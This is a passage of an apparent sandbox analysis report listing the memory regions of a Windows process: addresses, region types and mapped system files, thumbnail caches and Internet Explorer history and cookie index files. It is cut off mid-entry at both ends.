"\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 925 start_va = 0x2ee0000 end_va = 0x2ee1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ee0000" filename = "" Region: id = 926 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x2ef0000 region_type = mapped_file name = "{0b09c990-dfff-4f54-a0f7-84dceb6a5b2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0B09C990-DFFF-4F54-A0F7-84DCEB6A5B2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0b09c990-dfff-4f54-a0f7-84dceb6a5b2b}.2.ver0x0000000000000001.db") Region: id = 927 start_va = 0x2f00000 end_va = 0x2f03fff entry_point = 0x2f00000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 928 start_va = 0x2f10000 end_va = 0x2f10fff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 929 start_va = 0x2f20000 end_va = 0x2f85fff entry_point = 0x2f20000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 930 start_va = 0x2f90000 end_va = 0x308ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 931 start_va = 0x3090000 end_va = 0x3091fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003090000" filename = "" Region: id = 932 start_va = 0x30a0000 end_va = 0x30a3fff entry_point = 0x30a0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 933 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 934 start_va = 0x30c0000 end_va = 0x30c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030c0000" filename = "" Region: id = 935 start_va = 0x30d0000 end_va = 0x30d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030d0000" filename = "" Region: id = 936 start_va = 0x30e0000 end_va = 0x30e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030e0000" filename = "" Region: id = 937 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 938 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 939 start_va = 0x3110000 end_va = 0x314ffff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 940 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 941 start_va = 0x3160000 end_va = 0x3160fff entry_point = 0x3160000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 942 start_va = 0x3170000 end_va = 0x3179fff entry_point = 0x3170000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 943 start_va = 0x3180000 end_va = 0x3180fff entry_point = 0x3180000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 944 start_va = 0x3190000 end_va = 0x3190fff entry_point = 0x3190000 region_type = mapped_file name = "{e09a7d78-232a-4473-ac51-d6dfbb0b032a}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E09A7D78-232A-4473-AC51-D6DFBB0B032A}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e09a7d78-232a-4473-ac51-d6dfbb0b032a}.2.ver0x0000000000000002.db") Region: id = 945 start_va = 0x31a0000 end_va = 0x31a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031a0000" filename = "" Region: id = 946 start_va = 0x31b0000 end_va = 0x31bffff entry_point = 0x31b0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018081520180816\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012018081520180816\\index.dat") Region: id = 947 start_va = 0x31c0000 end_va = 0x31cffff entry_point = 0x31c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 948 start_va = 0x31d0000 end_va = 0x31dbfff entry_point = 0x31d0000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 949 start_va = 0x31e0000 end_va = 0x31e3fff entry_point = 0x31e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 950 start_va = 0x31f0000 end_va = 0x31f0fff entry_point = 0x31f0000 region_type = mapped_file name = "{7a77eb19-3f1f-481b-a465-50389a60f663}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{7A77EB19-3F1F-481B-A465-50389A60F663}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{7a77eb19-3f1f-481b-a465-50389a60f663}.2.ver0x0000000000000001.db") Region: id = 951 start_va = 0x3200000 end_va = 0x3200fff entry_point = 0x3200000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 952 start_va = 0x3210000 end_va = 0x3210fff entry_point = 0x3210000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 953 start_va = 0x3220000 end_va = 0x3220fff entry_point = 0x3220000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 954 start_va = 0x3230000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 955 start_va = 0x3270000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 956 start_va = 0x32b0000 end_va = 0x32b0fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 957 start_va = 0x32c0000 end_va = 0x32c0fff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 958 start_va = 0x32d0000 end_va = 0x32d0fff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 959 start_va = 0x32e0000 end_va = 0x32e0fff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 960 start_va = 0x32f0000 end_va = 0x32f0fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 961 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x3300000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 962 start_va = 0x3310000 end_va = 0x3310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003310000" filename = "" Region: id = 963 start_va = 0x3320000 end_va = 0x3320fff entry_point = 0x3320000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 964 start_va = 0x3330000 end_va = 0x3332fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 965 start_va = 0x3340000 end_va = 0x337ffff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 966 start_va = 0x3380000 end_va = 0x3380fff entry_point = 0x3380000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 967 start_va = 0x3390000 end_va = 0x3390fff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 968 start_va = 0x33a0000 end_va = 0x33a0fff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 969 start_va = 0x33b0000 end_va = 0x33b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033b0000" filename = "" Region: id = 970 start_va = 0x33c0000 end_va = 0x33c0fff entry_point = 0x33c0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 971 start_va = 0x33d0000 end_va = 0x34cffff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 972 start_va = 0x34d0000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 973 start_va = 0x3510000 end_va = 0x354ffff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 974 start_va = 0x3550000 end_va = 0x3550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003550000" filename = "" Region: id = 975 start_va = 0x3590000 end_va = 0x3590fff entry_point = 0x3590000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 976 start_va = 0x35a0000 end_va = 0x35a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035a0000" filename = "" Region: id = 977 start_va = 0x35b0000 end_va = 0x35b0fff entry_point = 0x35b0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 978 start_va = 0x35c0000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 979 start_va = 0x3600000 end_va = 0x3647fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 980 start_va = 0x3650000 end_va = 0x3651fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003650000" filename = "" Region: id = 981 start_va = 0x3660000 end_va = 0x3660fff entry_point = 0x3660000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 982 start_va = 0x3670000 end_va = 0x3670fff entry_point = 0x3670000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 983 start_va = 0x3680000 end_va = 0x3680fff entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 984 start_va = 0x3690000 end_va = 0x3690fff entry_point = 0x3690000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 985 start_va = 0x36a0000 end_va = 0x36a1fff entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 986 start_va = 0x36b0000 end_va = 0x36b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036b0000" filename = "" Region: id = 987 start_va = 0x36c0000 end_va = 0x36fffff entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 988 start_va = 0x3700000 end_va = 0x3701fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003700000" filename = "" Region: id = 989 start_va = 0x3710000 end_va = 0x3710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003710000" filename = "" Region: id = 990 start_va = 0x3720000 end_va = 0x3720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003720000" filename = "" Region: id = 991 start_va = 0x3730000 end_va = 0x3730fff entry_point = 0x3730000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 992 start_va = 0x3740000 end_va = 0x3741fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003740000" filename = "" Region: id = 993 start_va = 0x3750000 end_va = 0x3751fff entry_point = 0x3750000 region_type = mapped_file name = "msutb.dll.mui" filename = "\\Windows\\System32\\en-US\\msutb.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msutb.dll.mui") Region: id = 994 start_va = 0x3760000 end_va = 0x379ffff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 995 start_va = 0x37a0000 end_va = 0x37a0fff entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 996 start_va = 0x37b0000 end_va = 0x37b0fff entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 997 start_va = 0x37d0000 end_va = 0x37d7fff entry_point = 0x37d0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 998 start_va = 0x37e0000 end_va = 0x37e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037e0000" filename = "" Region: id = 999 start_va = 0x37f0000 end_va = 0x382ffff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 1000 start_va = 0x3830000 end_va = 0x3842fff entry_point = 0x3830000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1001 start_va = 0x3850000 end_va = 0x3851fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003850000" filename = "" Region: id = 1002 start_va = 0x3860000 end_va = 0x3864fff entry_point = 0x3860000 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 1003 start_va = 0x3870000 end_va = 0x38bffff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1004 start_va = 0x38c0000 end_va = 0x38ebfff entry_point = 0x38c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1005 start_va = 0x3900000 end_va = 0x393ffff entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1006 start_va = 0x3940000 end_va = 0x3d41fff entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 1007 start_va = 0x3d50000 end_va = 0x3d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 1008 start_va = 0x3d90000 end_va = 0x3d96fff entry_point = 0x3d90000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 1009 start_va = 0x3da0000 end_va = 0x3da1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003da0000" filename = "" Region: id = 1010 start_va = 0x3db0000 end_va = 0x3db7fff entry_point = 0x3db0000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 1011 start_va = 0x3dc0000 end_va = 0x3dc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dc0000" filename = "" Region: id = 1012 start_va = 0x3de0000 end_va = 0x3deffff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 1013 start_va = 0x3e00000 end_va = 0x3e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1014 start_va = 0x3e40000 end_va = 0x3e7ffff entry_point = 0x3e40000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1015 start_va = 0x3e80000 end_va = 0x3eb3fff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1016 start_va = 0x3ef0000 end_va = 0x3f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 1017 start_va = 0x3f30000 end_va = 0x402ffff entry_point = 0x3f30000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1018 start_va = 0x4070000 end_va = 0x40affff entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1019 start_va = 0x40e0000 end_va = 0x411ffff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1020 start_va = 0x4130000 end_va = 0x416ffff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 1021 start_va = 0x4180000 end_va = 0x41bffff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 1022 start_va = 0x41d0000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1023 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 1024 start_va = 0x4290000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 1025 start_va = 0x42e0000 end_va = 0x431ffff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 1026 start_va = 0x4330000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 1027 start_va = 0x4380000 end_va = 0x43bffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 1028 start_va = 0x4400000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1029 start_va = 0x4450000 end_va = 0x450ffff entry_point = 0x4450000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1030 start_va = 0x4520000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 1031 start_va = 0x4720000 end_va = 0x5a74fff entry_point = 0x4720000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1032 start_va = 0x5a80000 end_va = 0x5b7ffff entry_point = 0x5a80000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1033 start_va = 0x5b80000 end_va = 0x5bbffff entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1034 start_va = 0x5c70000 end_va = 0x5caffff entry_point = 0x0 region_type = private name = "private_0x0000000005c70000" filename = "" Region: id = 1035 start_va = 0x5cb0000 end_va = 0x5ceffff entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 1036 start_va = 0x5d20000 end_va = 0x5d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d20000" filename = "" Region: id = 1037 start_va = 0x5dd0000 end_va = 0x5e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 1038 start_va = 0x6110000 end_va = 0x620ffff entry_point = 0x6110000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1039 start_va = 0x6210000 end_va = 0x630ffff entry_point = 0x6210000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1040 start_va = 0x6410000 end_va = 0x680ffff entry_point = 0x0 region_type = private name = "private_0x0000000006410000" filename = "" Region: id = 1041 start_va = 0x6810000 end_va = 0x6c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 1042 start_va = 0x6c3c0000 end_va = 0x6c4c5fff entry_point = 0x6c3c0000 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 1043 start_va = 0x6cff0000 end_va = 0x6da6ffff entry_point = 0x6cff0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1044 start_va = 0x6db00000 end_va = 0x6dc19fff entry_point = 0x6db00000 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 1045 start_va = 0x6dd30000 end_va = 0x6dd5dfff entry_point = 0x6dd30000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1046 start_va = 0x6de70000 end_va = 0x6dea4fff entry_point = 0x6de70000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1047 start_va = 0x6e440000 end_va = 0x6e448fff entry_point = 0x6e440000 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 1048 start_va = 0x6e560000 end_va = 0x6e595fff entry_point = 0x6e560000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1049 start_va = 0x6e670000 end_va = 0x6e6f8fff entry_point = 0x6e670000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1050 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1051 start_va = 0x6e710000 end_va = 0x6e721fff entry_point = 0x6e710000 region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 1052 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1053 start_va = 0x6e9c0000 end_va = 0x6e9effff entry_point = 0x6e9c0000 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 1054 start_va = 0x6e9f0000 end_va = 0x6ea21fff entry_point = 0x6e9f0000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1055 start_va = 0x6ece0000 end_va = 0x6ee77fff entry_point = 0x6ece0000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 1056 start_va = 0x6ee80000 end_va = 0x6ee99fff entry_point = 0x6ee80000 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 1057 start_va = 0x6eef0000 end_va = 0x6eef3fff entry_point = 0x6eef0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 1058 start_va = 0x6ef10000 end_va = 0x6ef67fff entry_point = 0x6ef10000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 1059 start_va = 0x6ef70000 end_va = 0x6ef99fff entry_point = 0x6ef70000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 1060 start_va = 0x6f040000 end_va = 0x6f27ffff entry_point = 0x6f040000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1061 start_va = 0x6f280000 end_va = 0x6f286fff entry_point = 0x6f280000 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 1062 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1063 start_va = 0x6f300000 end_va = 0x6f577fff entry_point = 0x6f300000 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 1064 start_va = 0x6f580000 end_va = 0x6f588fff entry_point = 0x6f580000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 1065 start_va = 0x6f590000 end_va = 0x6f5bdfff entry_point = 0x6f590000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1066 start_va = 0x6f770000 end_va = 